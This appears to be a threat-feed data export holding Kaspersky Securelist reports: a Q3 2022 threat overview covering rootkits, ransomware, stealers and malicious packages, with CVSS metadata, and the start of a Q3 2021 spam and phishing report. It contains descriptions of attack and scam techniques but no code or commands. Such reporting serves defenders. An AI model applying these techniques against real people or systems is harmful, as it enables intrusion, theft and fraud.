_These statistics are based on detection verdicts returned by the OAS and ODS Anti-Virus modules received from users of Kaspersky Lab products who consented to provide statistical data. The data include detections of malicious programs located on user computers or on removable media connected to computers, such as flash drives, camera and phone memory cards, or external hard drives.
* Excluded are countries with relatively few Kaspersky Lab users (under 10,000).
** Unique users on whose computers Malware-class local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country._

_Geography of malicious web attacks in Q2 2018 (ranked by percentage of users attacked)_

On average, 19.58% of computers globally faced at least one Malware-class local threat in Q2.

Source: "IT threat evolution Q2 2018. Statistics", Securelist, published 2018-08-06: <https://securelist.com/it-threat-evolution-q2-2018-statistics/87170/>

 * **IT threat evolution in Q3 2022**
 * [IT threat evolution in Q3 2022. Non-mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2022-non-mobile-statistics/107963/>)
 * [IT threat evolution in Q3 2022. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2022-mobile-statistics/107978/>)

## Targeted attacks

### CosmicStrand: discovery of a sophisticated UEFI rootkit

In July, we [reported a rootkit](<https://securelist.com/cosmicstrand-uefi-firmware-rootkit/106973/>) that we found in modified [Unified Extensible Firmware Interface](<https://encyclopedia.kaspersky.com/glossary/uefi/?utm_source=SL&utm_medium=SL&utm_campaign=SL>) (UEFI) firmware, the code that loads and initiates the boot process when the computer is turned on. Rootkits are malware implants that are installed deep in the operating system. Difficult to detect, they ensure that a computer remains infected even if someone reinstalls the operating system or replaces the hard drive. However, they aren't easy to create: the slightest programming error could crash the machine. Nevertheless, in our [APT predictions for 2022](<https://securelist.com/advanced-threat-predictions-for-2022/104870/>), we noted that more attackers would reach the sophistication level required to develop such tools.

The main purpose of CosmicStrand is to download a malicious program at startup, which then performs the tasks set by the attackers.
Having successfully passed through all stages of the boot process, the rootkit eventually runs shellcode and contacts the attackers' C2 (Command-and-Control) server, from which it receives a malicious payload.

We were unable to intercept the file received by the rootkit from the C2 server. However, on one of the infected machines, we found malware that we think is probably related to CosmicStrand. This malware creates a user named "aaaabbbb" in the operating system with local administrator rights.

We identified targets of CosmicStrand, which we attribute to an unknown Chinese-speaking threat actor, in China, Vietnam, Iran and Russia. All of them were ordinary people using our free antivirus solution, seemingly unconnected with any organization of interest to a sophisticated attacker of this kind. It also turned out that the motherboards infected in all known cases came from just two manufacturers. Therefore, it's likely that the attackers found some common vulnerability in these motherboards that made UEFI infection possible.

It's also unclear how the attackers managed to deliver the malware. It's possible that the attackers are able to infect UEFI remotely. Or that those infected had purchased a modified motherboard from a reseller.

### Andariel deploys DTrack and Maui ransomware

On 6 July, the US CISA (Cybersecurity and Infrastructure Security Agency) published an [alert](<https://www.cisa.gov/uscert/ncas/alerts/aa22-187a>) in which it accused North Korean state-sponsored threat actors of using the Maui ransomware to target the US healthcare sector. While CISA offered nothing to substantiate its attribution, [we determined](<https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/>) that approximately 10 hours prior to deploying Maui to the initial target system, the group deployed a variant of the well-known DTrack malware to the same target, preceded by deployment of the 3proxy tool months earlier. We believe that this helps to solidify the attribution to the Korean-speaking APT Andariel (aka Silent Chollima and Stonefly), with low-to-medium confidence.

Andariel's primary tool is DTrack, used to collect information about the target, send it to a remote host and, in the case of the variant used in these attacks, store it on a remote host in the target network. When the attackers find noteworthy data, the Maui ransomware is deployed – it is typically detected on targeted hosts 10 hours after the activation of DTrack.

The attackers also use another tool, called 3Proxy, to maintain remote access to the compromised computer.

To infect target systems, the attackers exploit unpatched versions of public online services. In one such case, the malware was downloaded from an HFS (HTTP file server): the attackers used an unknown exploit that enabled them to run a PowerShell script from a remote server. In another, they were able to compromise a WebLogic server through an exploit for the CVE-2017-10271 vulnerability, which ultimately allowed them to run a script.

Our research revealed that, rather than just focusing on a particular industry, Andariel is ready to attack any company. We detected at least one attack on a housing company in Japan, as well as several targets in India, Vietnam and Russia.

### VileRAT: DeathStalker's continuous strike at foreign and crypto-currency exchanges

In late August 2020, we published an [overview of DeathStalker](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) and its activities, including the Janicab, Evilnum and PowerSing campaigns. Later that year, we documented the [PowerPepper](<https://securelist.com/what-did-deathstalker-hide-between-two-ferns/99616/>) campaign. We believe DeathStalker to be a group of mercenaries, offering hack-for-hire services, or acting as an information broker to support competitive and financial intelligence efforts. Meanwhile, in August 2020, we also released a private report on VileRAT for our threat intelligence customers. VileRAT is a Python implant, part of [an evasive and highly intricate attack campaign](<https://securelist.com/vilerat-deathstalkers-continuous-strike/107075/>) against foreign exchange and cryptocurrency trading companies. We discovered it in Q2 2020 as part of an update of Evilnum, and attributed it to DeathStalker.

Since we first identified it, DeathStalker has continuously updated and used its VileRAT tool-chain against the same type of targets.

The threat actor has also sought to escape detection. However, the VileRAT campaign took this to another level: it is undoubtedly the most intricate, obfuscated and tentatively evasive campaign we have ever identified from DeathStalker. From state-of-the-art obfuscation with VBA and JavaScript, to multi-layered and low-level packing with Python, a robust multi-stage in-memory PE loader and security vendor-specific heuristic bypasses – the threat actor has left nothing to chance. On top of this, DeathStalker has developed a vast and quickly changing infrastructure as well.

On the other hand, there are some glitches and inconsistencies. VileRAT, the final payload in the tool-chain, is more than 10MB in size. The group uses simple infection vectors, many suspicious communication patterns, noisy and easy-to-identify process executions or file deployments, as well as sketchy development practices leaving bugs that require frequent implant updates. For these reasons, an effective endpoint solution will still be able to detect and block most VileRAT-related malicious activities.

Using only data that we could verify with our own telemetry, we identified 10 organizations compromised or targeted by DeathStalker since 2020 – in Bulgaria, Cyprus, Germany, the Grenadines, Kuwait, Malta, the UAE and the Russian Federation.

We do not know what DeathStalker's principal intention is in targeting these organizations: this could range from due diligence, asset recovery, information gathering in the context of litigation or arbitration cases, aiding customers to bypass sanctions and/or spying on targets' customers. However, it does not appear to be direct financial gain.

### Kimsuky's GoldDragon cluster and C2 operations

Kimsuky is a prolific and active threat actor primarily targeting North Korea-related entities. Like other sophisticated adversaries, this group updates its tools frequently. We recently had the chance to investigate how the threat actor configures its GoldDragon cluster and what kind of tricks it uses to confirm and further validate its victims. The Kimsuky group has configured multi-stage C2 servers with various commercial hosting services located around the world.

The attacks occur in several stages. First, the threat actor sends a spear-phishing email to the potential victim with a lure to download additional documents. If the victim clicks the link, it results in a connection to the first-stage C2 server, with an email address as a parameter. The first-stage C2 server verifies that the incoming email address parameter is expected and delivers the malicious document if it's in the target list. The first-stage script also forwards the victim's IP address to the next-stage server. When the fetched document is opened, it connects to the second C2 server. The corresponding script on the second C2 server checks the IP address forwarded from the first-stage server to verify that it's an expected request from the same victim. Using this IP validation scheme, the actor verifies whether the incoming request is from the victim or not. On top of that, the operator relies on several other processes to carefully deliver the next payload. Another C2 script on the second C2 server checks the operating system type and predefined user-agent strings to filter out requests from security researchers or auto-analysis systems.

Based on the contents of the decoy document, we hypothesize that the targets of this operation are people or entities related to political or diplomatic activities. We know that historically politicians, diplomats, journalists, professors and North Korean defectors have been prime targets of the Kimsuky group. The email address names from the C2 scripts help to confirm this hypothesis.

Our [research](<https://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/>) underlines how Kimsuky pays close attention to validating its victims and delivering the next-stage payloads to them, while taking steps to make analysis difficult.

### Targeted attacks on industrial enterprises

In August, Kaspersky ICS CERT experts reported [a wave of targeted attacks on military industrial complex enterprises and public institutions](<https://ics-cert.kaspersky.com/publications/reports/2022/08/08/targeted-attack-on-industrial-enterprises-and-public-institutions/?utm_source=securelist&utm_medium=link&utm_campaign=targeted-attack-on-industrial-enterprises-and-public-institutions>) in Belarus, Russia, Ukraine and Afghanistan. The attacks, which took place earlier this year, affected industrial plants, design bureaus and research institutes, government agencies, ministries and departments. We identified more than a dozen targets, and observed significant overlaps in TTPs (Tactics, Techniques and Procedures) with the threat actor TA428.

The attackers gained access to the enterprise network using carefully crafted phishing emails. Some of the information they contained is not publicly available, indicating that the attackers conducted reconnaissance ahead of the attack, possibly using information obtained in earlier attacks on the target organization or others associated with the target. Microsoft Word documents attached to the phishing emails contained malicious code that exploits the [CVE-2017-11882](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882>) vulnerability, which enables an attacker to execute arbitrary code – in this case, the main module of the PortDoor backdoor – without any additional user action.

The attackers used five different backdoors at the same time – probably for redundancy. They provide extensive functionality for controlling infected systems and collecting confidential data. Once they have gained initial access, the attackers attempt to spread to other computers on the network. Once they have obtained domain administrator privileges, they search for, and exfiltrate, sensitive data to their servers hosted in different countries – these servers are also used as first-stage C2 servers. The attackers compress stolen files into encrypted and password-protected ZIP archives. After receiving the data, the first-stage C2 servers forward the archives to a second-stage server located in China.

## Other malware

### Prilex: the pricey prickle credit card complex

Prilex, active since 2014, is a well-known threat actor targeting ATMs and Point of Sale (PoS) terminals. In 2016, the group began to focus all its activities on PoS systems. Since then the group has greatly improved its malware: it develops complex threats and poses a major threat to the payment chain. Prilex is now conducting so-called "GHOST" attacks – fraudulent transactions using cryptograms, which are pre-generated by the victim's card during the store payment process.

The group delivers its malware using social engineering. The cybercriminals call their chosen target and tell them their PoS software needs to be updated by a technician. Later, the fake technician goes to the targeted company in person and infects the machines. Alternatively, they persuade the target to install AnyDesk and use this to install the malware remotely.

Prior to striking victims, the cybercriminals perform an initial screening of the machine, in order to check the number of transactions that have already taken place and whether this target is worth attacking. If so, the malware captures any running transaction and modifies its content in order to be able to capture the card information. All the captured card details are then saved to an encrypted file, which is later sent to the attackers' server, allowing them to make transactions through a fraudulent PoS device registered in the name of a fake company.

Having attacked one PoS system, the cybercriminals obtain data from dozens, or even hundreds, of cards daily. It is especially dangerous if the infected machines are located in popular shopping malls in densely populated cities, where the daily flow of customers can reach thousands of people.

In [our recent investigation](<https://securelist.com/prilex-atm-pos-malware-evolution/107551/>), we discovered that the Prilex group is controlling the development lifecycle of its malware using Subversion – as used by professional development teams. Moreover, there is also a supposed official Prilex website selling its malware kits to other cybercriminals as Malware-as-a-Service (MaaS). Prilex has previously sold various versions of its malware on the [dark web](<https://encyclopedia.kaspersky.com/glossary/dark-web/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>); for example, in 2019 a German bank [lost more than €1.5 million](<https://www.zdnet.com/article/german-bank-loses-eur1-5-million-in-mysterious-cashout-of-emv-cards/>) in a similar attack by the Prilex malware. The development of its MaaS operation means that highly sophisticated and dangerous PoS malware could spread to many countries, increasing the risk of multimillion-dollar losses for businesses all around the world.

We also discovered websites and Telegram chats where cybercriminals sell Prilex malware. Posing as the Prilex group itself, they offer the latest versions of PoS malware, costing from $3,500 to $13,000. We are not sure about the real ownership of these websites, as they could be copycats.

### Luna and Black Basta: new ransomware for Windows, Linux and ESXi

Ransomware groups have increasingly targeted not only Windows computers, but also Linux devices and ESXi virtual machines. We highlighted one example earlier this year – the [BlackCat](<https://www.kaspersky.com/blog/black-cat-ransomware/44120/>) gang, which distributes malware written in the cross-platform language Rust. We recently analyzed two other malware families that provide similar functionality: [Black Basta and Luna](<https://securelist.com/luna-black-basta-ransomware/106950/>).

Black Basta, first discovered in February, exists in versions for Windows and for Linux – the latter primarily targeting ESXi virtual machine images. One of the key features of the Windows version is that it boots the system in Safe Mode before encrypting data: this allows the malware to evade detection by security solutions, many of which don't work in Safe Mode.

At the time we published our report, Black Basta operators had released information on 40 victims, among them manufacturing and electronics firms, contractors, and others, located in the US, Australia, Europe, Asia and Latin America.

Luna, discovered in June and also written in Rust, is able to encrypt both Windows and Linux devices, as well as ESXi virtual machine images. In an advert on the dark web, the cybercriminals claim to co-operate only with Russian-speaking partners. This means that the targets of interest to the attackers are most likely located outside the former Soviet Union. This is also borne out by the fact that the ransom note embedded into the code of the ransomware is written in English, albeit with mistakes.

### Malicious packages in online code repositories

In July, we reported a malicious campaign that we named [LofyLife](<https://securelist.com/lofylife-malicious-npm-packages/107014/>). Using our internal automated system for monitoring open-source repositories, our researchers identified four malicious packages spreading Volt Stealer and Lofy Stealer malware in the npm repository.

The identified malicious packages appeared to be used for ordinary tasks such as formatting headlines or certain gaming functions. The "formatting headlines" package was in Brazilian Portuguese with a "#brazil" hashtag, suggesting that the attackers were seeking to target people based in Brazil. Other packages were presented in English, so they could be targeting users from other countries.

The packages contained highly obfuscated malicious JavaScript and Python code. This made them harder to analyze when being uploaded to the repository. The malicious payload consisted of malware written in Python dubbed Volt Stealer – an open-source malicious script – and JavaScript malware dubbed Lofy Stealer. Volt Stealer was used to steal Discord tokens from infected machines, along with the victim's IP address, and upload them via HTTP. Lofy Stealer infects Discord client files and monitors the victim's actions, detecting when a person logs in, changes the registered email or password, enables or disables multi-factor authentication and adds new payment methods (in which case the malware steals full credit card details). It uploads collected information to a remote endpoint.

The npm repository is an open-source home for JavaScript developers to share and reuse code for building various web applications. As such, it represents a significant supply chain that, if exploited by attackers, can be used to deliver malware to many people. [This is not the first time we've seen an npm package poisoned in this way](<https://www.kaspersky.com/blog/uaparser-js-infected-versions/42700/>).

npm is not the only such code repository to have been targeted recently. In August, Check Point [published a report](<https://research.checkpoint.com/2022/cloudguard-spectral-detects-several-malicious-packages-on-pypi-the-official-software-repository-for-python-developers/>) on 10 malicious Python packages in the Python Package Index (PyPI), the most popular Python repository among software developers. The malicious packages were intended to steal developers' personal data and credentials. Following this research, [we discovered two other malicious Python packages in the PyPI](<https://securelist.com/two-more-malicious-python-packages-in-the-pypi/107218/>), masquerading as one of the most popular open-source packages, "[requests](<https://pypi.org/project/requests/#files>)".

The attacker used the description of the legitimate "requests" package in order to trick victims into installing a malicious one. In addition, the description contained fake statistics, and the project description referenced the web pages of the original "requests" package, as well as the author's email. All mentions of the legitimate package's name were replaced with the name of the malicious one.

### Cyberthreats facing gamers

The gaming industry is huge and growing. The industry attracts [an audience of more than 3 billion people worldwide](<https://newzoo.com/insights/articles/games-market-engagement-revenues-trends-2020-2023-gaming-report>) – a huge pool of potential victims for cybercriminals who target this sector. Cybercriminals make extensive use of social engineering tricks to entice potential victims into installing malware: [the promise of an Android version of a game that's not on Google Play](<https://www.kaspersky.com/blog/fortnite-security/23685/>); [the chance to play games for free](<https://www.kaspersky.com/blog/free-smartphone-games/37303/>); access to game cheats; etc.

We recently published our [report on gaming-related threats](<https://securelist.com/gaming-related-cyberthreats-2021-2022/107346/>) in 2021–22. Here are some of the key headlines:

 * In the year up to June 2022, Kaspersky blocked gaming-related malware and unwanted software on the computers of 384,224 people, with 91,984 files distributed under the guise of 28 games.
 * The top five PC games used as bait in these attacks were Minecraft, Roblox, Need for Speed, Grand Theft Auto and Call of Duty.
 * The top five mobile games used as a lure to target gamers were Minecraft, Roblox, Grand Theft Auto, PUBG and FIFA.
 * Malware and unwanted software distributed as cheat programs stand out as a particular threat to gamers' security. In the year to June 2022, we detected 3,154 unique files of this type, affecting 13,689 people.
 * Miners pose an increasing threat, with Far Cry, Roblox, Minecraft, Valorant and FIFA heading the list of games and game series that cybercriminals used as a lure for such threats.

Among the top threats is RedLine, which we deemed worthy of a [separate report](<https://securelist.com/self-spreading-stealer-attacks-gamers-via-youtube/107407/>). The attackers distribute this password-stealing Trojan under the guise of game cheats in an attempt to steal accounts, card numbers, crypto-wallets and more. They post videos on YouTube purportedly about how to use cheats in popular online games such as Rust, FIFA 22, DayZ and others. The videos prompt the victim to follow a link in the description to download and run a self-extracting archive.

The Trojan, once installed, steals account passwords, credit card details, session cookies and more. RedLine is also able to execute commands on the computer, as well as download and install other programs onto the infected machine.

RedLine also comes with a cryptocurrency miner. Gaming computers are a logical target for cybercriminals, since they typically have powerful GPUs – useful for cryptocurrency mining.

In addition to losing sensitive data, the player's reputation is at stake. RedLine downloads videos from the C2 server and posts them on the victim's YouTube channel – the same video that led the gamer to become infected. In this way, the victims become the means by which other gamers become infected.

### NullMixer: oodles of Trojans in a single dropper

Trying to save money by using unlicensed software can be costly: a single file downloaded from an unreliable source can result in system compromise.
In September, we published our analysis of NullMixer, a Trojan dropper designed to drop a wide variety of malware families.\n\nNullMixer spreads via malicious web sites that can be accessed using standard search engines. Often, the web sites host "cracks", "keygens" and activators for downloading software illegally: they pretend to be legitimate, but actually contain a malware dropper. They stay at the top of search engine results using SEO.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/09/23132345/NullMixer_report_01.png>)\n\nWhen someone attempts to download software from one of these sites, they are redirected multiple times, ending up on a page containing download instructions and archived password-protected malware masquerading as the desired piece of software. When they extract and execute the file, the malware drops a number of malicious files to the compromised machine. The malware families dropped onto the computer include SmokeLoader/Smoke, LgoogLoader, Disbuk, RedLine (described above), Fabookie and ColdStealer, consisting of backdoors, spyware, bankers, credential stealers, droppers and more.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/09/23170555/NullMixer_report_06.jpg>)\n\nOnce all the dropped files have been launched, the NullMixer starter beacons to the C2 to confirm the successful installation. The dropped files are then left to their own devices.\n\nSince the beginning of the year, we have blocked attempts to infect more than 47,778 people worldwide. Some of the most targeted countries are Brazil, India, Russia, Italy, Germany, France, Egypt, Turkey and the US.\n\nMany of the malware families dropped by NullMixer are downloaders, which suggests that infections will not be limited to the malware families described in [our report](<https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/>). 
Many of the other malware families mentioned here are stealers, and compromised credentials can be used for further attacks inside a local network.\n\n### Potential threat in the browser\n\nBrowser extensions are very useful for blocking ads, keeping a to-do list, spellchecking, translating text and much more. They are also popular: Chrome, Safari, Mozilla and other browsers have their own online stores distributing thousands of extensions \u2013 and the most popular plug-ins there reach over 10 million people. However, extensions are not always secure; and even seemingly innocent add-ons can present a real risk.\n\nMalicious and unwanted add-ons promote themselves as useful, and often do have legitimate functions implemented along with malicious ones. Some impersonate popular legitimate extensions. Often, such add-ons are distributed through official marketplaces. In 2020, Google [removed](<https://threatpost.com/google-yanks-106-malicious-chrome-extensions/156731/>) 106 browser extensions from its Chrome Web Store \u2013 all siphoned off sensitive user data, such as cookies and passwords, and even took screenshots. These extensions had been downloaded 32 million times.\n\nIt's always good to check the permissions an extension requests during installation. And if it's asking for permission to do things that don't seem appropriate, don't install it. For example, a browser calculator that asks for access to geolocation or browsing history. However, it's not always so clear. Often the wording is so vague that it is impossible to tell exactly how secure an extension is. Basic extensions often require permission to "read and change all your data on the websites you visit". They may really need it in order to function properly, but this permission gives the extension wide powers.\n\nEven if not malicious, they can still be dangerous. Many collect massive amounts of data from web pages people visit. 
To earn more money, some developers [may pass](<https://www.pcworld.com/article/410966/web-of-trust-browser-extensions-yanked-after-proving-untrustworthy.html>) it on to third parties or sell it to advertisers. If that data is not anonymized properly, information about web sites that people visit and what they do there could be exposed to third parties.\n\nExtension developers are also able to push updates without requiring any action by the person who installed the extension. Even a legitimate extension could be later hijacked to install malware.\n\nWe recently published an [overview of the types of threat that mimic useful web-browser extensions and statistics on attacks](<https://securelist.com/threat-in-your-browser-extensions/107181/>), using data from the Kaspersky Security Network (KSN), for the period between January 2020 and June 2022.\n\nIn the first half of this year, 1,311,557 people tried to download malicious or unwanted extensions at least once, which is more than 70 percent of the number affected by the same threat in the whole of last year.\n\nFrom January 2020 to June 2022, adware hiding in browser extensions affected more than 4.3 million people, which is approximately 70 percent of all people affected by malicious and unwanted add-ons.\n\nThe most common threat in the first half of 2022 was the WebSearch family of adware extensions, able to collect and analyze search queries and redirect people to affiliate links.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-18T08:00:32", "type": "securelist", "title": "IT threat evolution Q3 2022", "bulletinFamily": "blog", "cvss2": 
{"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10271", "CVE-2017-11882"], "modified": "2022-11-18T08:00:32", "id": "SECURELIST:F4445BFDE49DF55279E5B69E613E7CA2", "href": "https://securelist.com/it-threat-evolution-q3-2022/107957/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-01T16:36:08", "description": "\n\n## Quarterly highlights\n\n### Scamming championship: sports-related fraud\n\nThis summer and early fall saw some major international sporting events. The delayed Euro 2020 soccer tournament was held in June and July, followed by the equally delayed Tokyo Olympics in August. Q3 2021 also featured several F1 Grand Prix races. There was no way that cybercriminals and profiteers could pass up such a golden opportunity. Fans wanting to attend events live encountered fake ticket-selling websites. Some sites made a point of stressing the tickets were "official", despite charging potential victims several times the [real price of a ticket](<https://www.kaspersky.ru/blog/ofitsialnye-bilety-v-teatr/25890/>), and some just took the money and disappeared.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123731/Spam_report_Q3_2021_01.png>)\n\nScammers also laid traps for those preferring to watch the action online from the comfort of home. Fraudulent websites popped up offering free live broadcasts. On clicking the link, however, the user was asked to pay for a subscription. 
If that did not deter them, their money and bank card details went straight to the scammers, with no live or any other kind of broadcast in return. This scheme has been used many times before, only instead of sporting events, victims were offered the hottest movie and TV releases.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123806/Spam_report_Q3_2021_02.png>)\n\nSoccer video games always attract a large following. This success has a downside: gaming platforms get attacked by hackers, especially during major soccer events. Accordingly, the Euro 2020 championship was used by scammers as bait to hijack accounts on the major gaming portal belonging to Japanese gaming giant Konami. The cybercriminals offered users big bonuses in connection with the tournament. However, when attempting to claim the bonus, the victim would land on a fake Konami login page. If they entered their credentials, the attackers took over their account and the "bonus" evaporated into thin air.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29123923/Spam_report_Q3_2021_03.png>)\n\n"Nigerian prince" scammers also had a close eye on Q3's sporting fixture. The e-mails that came to our attention talked about multi-million-dollar winnings in Olympics-related giveaways. To receive the prize, victims were asked to fill out a form and e-mail it to the cybercriminals.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124024/Spam_report_Q3_2021_04.png>)\n\nSome messages anticipated upcoming events in the world of sport. 
The FIFA World Cup is slated for far-off November \u2014 December 2022, yet scammers are already inventing giveaways related to it.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124115/Spam_report_Q3_2021_05.png>)\n\nAmong other things, we found some rather unusual spam e-mails with an invitation to bid for the supply of products to be sold at airports and hotels during the World Cup. Most likely, the recipients would have been asked to pay a small commission to take part in the bidding or giveaway, with no results ever coming forth.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124200/Spam_report_Q3_2021_06.png>)\n\n### Scam: get it yourself, share with friends\n\nIn Q3 2021, our solutions blocked more than 5.6 million redirects to phishing pages. Anniversaries of well-known brands have become a favorite topic for attackers. According to announcements on fake sites, IKEA, Amazon, Tesco and other companies all held prize draws to celebrate a milestone date. Wannabe participants had to perform a few simple actions, such as taking a survey or a spot-the-hidden-prize contest, or messaging their social network contacts about the promotion, and then were asked to provide card details, including the CVV code, to receive the promised payout. That done, the attackers not only got access to the card, but also requested payment of a small commission to transfer the (non-existent) winnings. Curiously, the scammers came up with fake round dates, for example, the 80th anniversary of IKEA, which in reality will come two years later. 
It is always advisable to check promotions on official websites, rather than trusting e-mails, which are easy to spoof.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124249/Spam_report_Q3_2021_07.png>)\n\nThere were also plenty of "holiday deals" supposedly from major Russian brands, with some, it seemed, showing particular generosity in honor of September 1, or Knowledge Day, when all Russian schools and universities go back after the summer break. Those companies allegedly giving away large sums were all related to education in one way or another. At the same time, the fraudulent scheme remained largely the same, with just some minor tinkering round the edges. For example, fake Detsky Mir (Children's World, a major chain of kids' stores) websites promised a fairly large sum of money, but on condition that the applicant sends a message about the "promotion" to 20 contacts or 5 groups. And the payment was then delayed, allegedly due to the need to convert dollars into rubles: for this operation, the "lucky ones" had to pay a small fee.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124402/Spam_report_Q3_2021_08.png>)\n\nOn a fake website holding a giveaway under the Perekrestok brand, after completing the tasks the "winner" was promised as a prize a QR code that could supposedly be used to make purchases in the company's stores. Note that Perekrestok does indeed issue coupons with QR codes to customers; that is, the cybercriminals tried to make the e-mail look plausible. When trying to retrieve this code, the potential victim would most likely be asked to pay a "commission" before being able to spend the prize money. 
Note too that QR codes from questionable sources can carry other threats, for example, spreading malware or debiting money in favor of the scammers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124531/Spam_report_Q3_2021_09.png>)\n\nIn 2021, there was an increase in the number of fake resources posing as cookie-selling platforms. Users were promised a generous monetary reward (up to $5,000 a day) for selling such data. Those who fell for the tempting offer and followed the link were redirected to a fake page that allegedly "reads cookies from the victim's device to estimate their market value." The "valuation" most often landed in the US$700\u20132,000 range. To receive this money, the user was asked to put the cookies up at a kind of auction, in which different companies were allegedly taking part. The scammers assured them that the data would go to the one offering the highest price.\n\nIf the victim agreed, they were asked to link their payment details to the account in the system and to top it up by \u20ac6, which the scammers promised to return, together with the auction earnings, within a few minutes. To top up the balance, the victim was required to enter their bank card details into an online form. Naturally, they received no payment, and the \u20ac6 and payment details remained in the attackers' possession.\n\nNote that the very idea of selling cookies from your device is risky: these files can store confidential information about your online activity \u2014 in particular, login details that let you avoid having to re-enter your credentials on frequently used sites.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124600/Spam_report_Q3_2021_10-scaled-1.jpeg>)\n\nEven in official mobile app stores, malware can sometimes sneak in. This quarter, for example, saw a new threat in the shape of fraudulent welfare payment apps that could be downloaded from such platforms. 
The blurb described them as software that helps find and process payments from the government that the user is entitled to. Due payments (fake, of course) were indeed found, but to receive the money, the user was requested to "pay for legal services relating to form registration". The numerous positive reviews under the application form, as well as the design mimicking real government sites, added credibility. We informed the store in question, which then removed the fraudulent apps.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124627/Spam_report_Q3_2021_11.png>)\n\n### Spam support: call now, regret later\n\nE-mails inviting the recipient to contact support continue to be spam regulars. If previously they were dominated by IT topics (problems with Windows, suspicious activity on the computer, etc.), recently we have seen a rise in the number of e-mails talking about unexpected purchases, bank card transactions or account deactivation requests. Most likely, the change of subject matter is an attempt to reach a wider audience: messages about unintentional spending and the risk of losing an account can frighten users more than abstract technical problems. However, the essence of the scam remained the same: the recipient, puzzled by the e-mail about a purchase or transfer they did not make, tried to call the support service at the number given in the message. To cancel the alleged transaction or purchase, they were asked to give their login credentials for the site from where the e-mail supposedly came. This confidential information fell straight into the hands of the cybercriminals, giving them access to the victim's account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124650/Spam_report_Q3_2021_12.png>)\n\n### COVID-19\n\nNew life was injected into the COVID-19 topic this quarter. 
In connection with mass vaccination programs worldwide, and the introduction of QR codes and certificates as evidence of vaccination or antibodies, fraudsters began "selling" their own. We also encountered rogue sites offering negative PCR test certificates. The "customer" was asked first to provide personal information: passport, phone, medical policy, insurance numbers and date of birth, and then to enter their card details to pay for the purchase. As a result, all this information went straight to the malefactors.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124714/Spam_report_Q3_2021_13.png>)\n\nSpam in the name of generous philanthropists and large organizations offering lockdown compensation is already a standard variant of the "Nigerian prince" scam.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124741/Spam_report_Q3_2021_14.png>)\n\nHowever, "Nigerian prince" scams are not all that might await recipients of such messages. For example, the authors of spam exploiting Argentina's BBVA name had a different objective. Users were invited to apply for a government subsidy through this bank. To do so, they had to unpack a RAR archive that allegedly contained a certificate confirming the compensation. In reality, the archive harbored malware detected by our solutions as Trojan.Win32.Mucc.pqp.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/10/29124803/Spam_report_Q3_2021_15.png>)\n\nCybercriminals also used other common COVID-19 topics to trick recipients into opening malicious attachments. In particular, we came across messages about the spread of the delta variant and about vaccination. The e-mail headers were picked from various information sources, chosen, most likely, for their intriguing nature. 
